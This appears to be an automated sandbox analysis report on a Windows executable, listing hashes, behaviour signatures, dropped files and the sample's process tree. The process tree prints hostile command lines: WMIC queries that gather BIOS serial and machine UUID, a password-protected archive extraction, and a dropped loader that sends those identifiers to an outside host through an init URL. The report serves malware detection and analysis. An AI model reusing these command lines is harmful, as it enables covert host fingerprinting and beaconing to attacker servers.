05ef60df87c1f63c4290520a2d9cb27a4e004579ff0a2ca3e48c46db5ad1dcb2

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
24-12-2023 18:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a9b033acd106ba0507f91884ef93515.exe
Size

406KB
MD5

0a9b033acd106ba0507f91884ef93515
SHA1

fc11c2a1ab2711f2b74afe1ea48b84ae487c75ba
SHA256

05ef60df87c1f63c4290520a2d9cb27a4e004579ff0a2ca3e48c46db5ad1dcb2
SHA512

dd72c17e602a9fd6604a545982350828533d9d824d5794add606159e9156d97b2d45d845b23022ea113249bed1a2663b6ea7e5fb51dcce343d0bd7cfcadf33b2
SSDEEP

12288:MA0i50G7eAqDwV4Iu/cRQn5uFNUwbhG+bzv:MAfyGSAqg4IUcRyQNUwv

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2688	7za.exe
2628	setupcl.exe

Loads dropped DLL 12 IoCs

pid	Process
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
2732	0a9b033acd106ba0507f91884ef93515.exe
1496	WerFault.exe
1496	WerFault.exe
1496	WerFault.exe
1496	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process
1496	2628	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2348	WMIC.exe
Token: SeSecurityPrivilege	2348	WMIC.exe
Token: SeTakeOwnershipPrivilege	2348	WMIC.exe
Token: SeLoadDriverPrivilege	2348	WMIC.exe
Token: SeSystemProfilePrivilege	2348	WMIC.exe
Token: SeSystemtimePrivilege	2348	WMIC.exe
Token: SeProfSingleProcessPrivilege	2348	WMIC.exe
Token: SeIncBasePriorityPrivilege	2348	WMIC.exe
Token: SeCreatePagefilePrivilege	2348	WMIC.exe
Token: SeBackupPrivilege	2348	WMIC.exe
Token: SeRestorePrivilege	2348	WMIC.exe
Token: SeShutdownPrivilege	2348	WMIC.exe
Token: SeDebugPrivilege	2348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2348	WMIC.exe
Token: SeRemoteShutdownPrivilege	2348	WMIC.exe
Token: SeUndockPrivilege	2348	WMIC.exe
Token: SeManageVolumePrivilege	2348	WMIC.exe
Token: 33	2348	WMIC.exe
Token: 34	2348	WMIC.exe
Token: 35	2348	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2348	WMIC.exe
Token: SeSecurityPrivilege	2348	WMIC.exe
Token: SeTakeOwnershipPrivilege	2348	WMIC.exe
Token: SeLoadDriverPrivilege	2348	WMIC.exe
Token: SeSystemProfilePrivilege	2348	WMIC.exe
Token: SeSystemtimePrivilege	2348	WMIC.exe
Token: SeProfSingleProcessPrivilege	2348	WMIC.exe
Token: SeIncBasePriorityPrivilege	2348	WMIC.exe
Token: SeCreatePagefilePrivilege	2348	WMIC.exe
Token: SeBackupPrivilege	2348	WMIC.exe
Token: SeRestorePrivilege	2348	WMIC.exe
Token: SeShutdownPrivilege	2348	WMIC.exe
Token: SeDebugPrivilege	2348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2348	WMIC.exe
Token: SeRemoteShutdownPrivilege	2348	WMIC.exe
Token: SeUndockPrivilege	2348	WMIC.exe
Token: SeManageVolumePrivilege	2348	WMIC.exe
Token: 33	2348	WMIC.exe
Token: 34	2348	WMIC.exe
Token: 35	2348	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2552	WMIC.exe
Token: SeSecurityPrivilege	2552	WMIC.exe
Token: SeTakeOwnershipPrivilege	2552	WMIC.exe
Token: SeLoadDriverPrivilege	2552	WMIC.exe
Token: SeSystemProfilePrivilege	2552	WMIC.exe
Token: SeSystemtimePrivilege	2552	WMIC.exe
Token: SeProfSingleProcessPrivilege	2552	WMIC.exe
Token: SeIncBasePriorityPrivilege	2552	WMIC.exe
Token: SeCreatePagefilePrivilege	2552	WMIC.exe
Token: SeBackupPrivilege	2552	WMIC.exe
Token: SeRestorePrivilege	2552	WMIC.exe
Token: SeShutdownPrivilege	2552	WMIC.exe
Token: SeDebugPrivilege	2552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2552	WMIC.exe
Token: SeRemoteShutdownPrivilege	2552	WMIC.exe
Token: SeUndockPrivilege	2552	WMIC.exe
Token: SeManageVolumePrivilege	2552	WMIC.exe
Token: 33	2552	WMIC.exe
Token: 34	2552	WMIC.exe
Token: 35	2552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2552	WMIC.exe
Token: SeSecurityPrivilege	2552	WMIC.exe
Token: SeTakeOwnershipPrivilege	2552	WMIC.exe
Token: SeLoadDriverPrivilege	2552	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2628	setupcl.exe
2628	setupcl.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2732 wrote to memory of 2348	2732	0a9b033acd106ba0507f91884ef93515.exe	28
PID 2732 wrote to memory of 2348	2732	0a9b033acd106ba0507f91884ef93515.exe	28
PID 2732 wrote to memory of 2348	2732	0a9b033acd106ba0507f91884ef93515.exe	28
PID 2732 wrote to memory of 2348	2732	0a9b033acd106ba0507f91884ef93515.exe	28
PID 2732 wrote to memory of 2552	2732	0a9b033acd106ba0507f91884ef93515.exe	31
PID 2732 wrote to memory of 2552	2732	0a9b033acd106ba0507f91884ef93515.exe	31
PID 2732 wrote to memory of 2552	2732	0a9b033acd106ba0507f91884ef93515.exe	31
PID 2732 wrote to memory of 2552	2732	0a9b033acd106ba0507f91884ef93515.exe	31
PID 2732 wrote to memory of 2820	2732	0a9b033acd106ba0507f91884ef93515.exe	33
PID 2732 wrote to memory of 2820	2732	0a9b033acd106ba0507f91884ef93515.exe	33
PID 2732 wrote to memory of 2820	2732	0a9b033acd106ba0507f91884ef93515.exe	33
PID 2732 wrote to memory of 2820	2732	0a9b033acd106ba0507f91884ef93515.exe	33
PID 2732 wrote to memory of 2620	2732	0a9b033acd106ba0507f91884ef93515.exe	36
PID 2732 wrote to memory of 2620	2732	0a9b033acd106ba0507f91884ef93515.exe	36
PID 2732 wrote to memory of 2620	2732	0a9b033acd106ba0507f91884ef93515.exe	36
PID 2732 wrote to memory of 2620	2732	0a9b033acd106ba0507f91884ef93515.exe	36
PID 2732 wrote to memory of 2688	2732	0a9b033acd106ba0507f91884ef93515.exe	38
PID 2732 wrote to memory of 2688	2732	0a9b033acd106ba0507f91884ef93515.exe	38
PID 2732 wrote to memory of 2688	2732	0a9b033acd106ba0507f91884ef93515.exe	38
PID 2732 wrote to memory of 2688	2732	0a9b033acd106ba0507f91884ef93515.exe	38
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2732 wrote to memory of 2628	2732	0a9b033acd106ba0507f91884ef93515.exe	42
PID 2628 wrote to memory of 3040	2628	setupcl.exe	40
PID 2628 wrote to memory of 3040	2628	setupcl.exe	40
PID 2628 wrote to memory of 3040	2628	setupcl.exe	40
PID 2628 wrote to memory of 3040	2628	setupcl.exe	40
PID 2628 wrote to memory of 1496	2628	setupcl.exe	41
PID 2628 wrote to memory of 1496	2628	setupcl.exe	41
PID 2628 wrote to memory of 1496	2628	setupcl.exe	41
PID 2628 wrote to memory of 1496	2628	setupcl.exe	41

C:\Users\Admin\AppData\Local\Temp\0a9b033acd106ba0507f91884ef93515.exe
"C:\Users\Admin\AppData\Local\Temp\0a9b033acd106ba0507f91884ef93515.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2732
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:2820
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2620
- C:\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\7za.exe
  7za.exe e -y -p"e255c46bdcbb0ec4750c9e35e39980d8" [RANDOM_STRING].7z
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe" /initurl http://sub.nuidal.info/init/0a9b033acd106ba0507f91884ef93515/:uid:? /affid "-" /id "0" /name " " /uniqid 0a9b033acd106ba0507f91884ef93515 /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2628

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic bios get serialnumber, version
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 372
1⤵
- Loads dropped DLL
- Program crash
PID:1496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
72KB

MD5
96f878a954ff85ef20b3d5affcc9fc65

SHA1
e795c163ab5dd43dbaea54dee2865b15681df846

SHA256
c1a01330a52df1d1092bd4f07fc312dfd9bf3942438bc393cca8fab85268978c

SHA512
b4d60fa60e1d2188ff1f88e2fb8a36be579e7809207b9017b4c95ec6f39ed83f73e4f2f5a08b4ace742bddb9386978afbaf45a66c2b28d2c91283b558cff779d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
50KB

MD5
bb5f2a75bc198a042f98e8ac53b51e41

SHA1
f23f66783c72b8ca6b8774e24aa925fdc6392328

SHA256
53ef97ccf3d74d1fcc0abb247d57b26dae470ecd7d06c3041f435ec5e184ff0f

SHA512
6429688e1450f25a95ced8b712a2cec452aa0a5a423ca5b7d25df3fbb28e456d5afb24f07fdc05ef4fc6ed599de27ff432427c97bbc2cdfe88e4745586d081d6

Download Submit
\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\nsExec.dll

Filesize
8KB

MD5
b8be6632a7dc8136ff01338be40fe701

SHA1
043fa16929b2af5ed5c1c59b4035a10cf765fb43

SHA256
289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

SHA512
403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

Download Submit
\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
46KB

MD5
adc729b49cd5bd4e845be2f44a00e7cc

SHA1
07a970cb1f111a23e1d00b95a9a8222374545f57

SHA256
8950648570aac7c52a4835ed0aea991d68222cd271b0db5ac0f93112b05ad431

SHA512
56db4b30197f5f8a67d14108c9d65a29385426aec5d5edcabd63739d0df45c2bfc23b5ee7325d455fd62693596202266d107716ddb5b04af6057f26f3a101f83

Download Submit
\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
4KB

MD5
711f880e0a8f67cb9b12897adb8166d0

SHA1
e6e353672177d64a5c190f1541cee8b36d28445f

SHA256
64909f04581e31e4aeb6b6984f21cc07436319ab7b6236855fdc73a9e175885b

SHA512
0cc465a64515bfdd94611f7e8c613218bd8a04c374408a3cff3a7fc39c16693ca67601e857214bf094126624af41d8bde6e2f5909ad781e9f86bfa504de23604

Download Submit
\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
26KB

MD5
8ca2df344d38c9a1d3ccda45901879cd

SHA1
55ff7a07754ec6399d8931b558434593c41ef34d

SHA256
185ec98c236dac71fc06a65bc78c7a940c7934197e20c8336d7f0b222a07e5c7

SHA512
784f7ee011bff69eb70ad5f3716dd22b14e84b75d9960e38170e9aeaa4e9b3842f54d72bb202959b17fb73838eae79cce93005612d8226688ff1e022b49ea84a

Download Submit
\Users\Admin\AppData\Local\Temp\nsd8C9.tmp\setupcl.exe

Filesize
89KB

MD5
258fdd2ece48168b80ccd86606deb18c

SHA1
c62316d0b15ebf35033ae3d3e076576b5697f640

SHA256
90c37687db7ba12ef2e352fd02abe6c6ffc020c2bc6d62b8f6db0fd35872ca3a

SHA512
41b9aa345dbe31373ffdf705246e602135415bb6430b7dd46508566390f4828ad0551e0dfe83b04e6403ce4a4a2808cef7c2ac7c6c3338276caf152ea97647dc

Download Submit
memory/2628-43-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/2628-47-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/2628-42-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2628-49-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2732-41-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download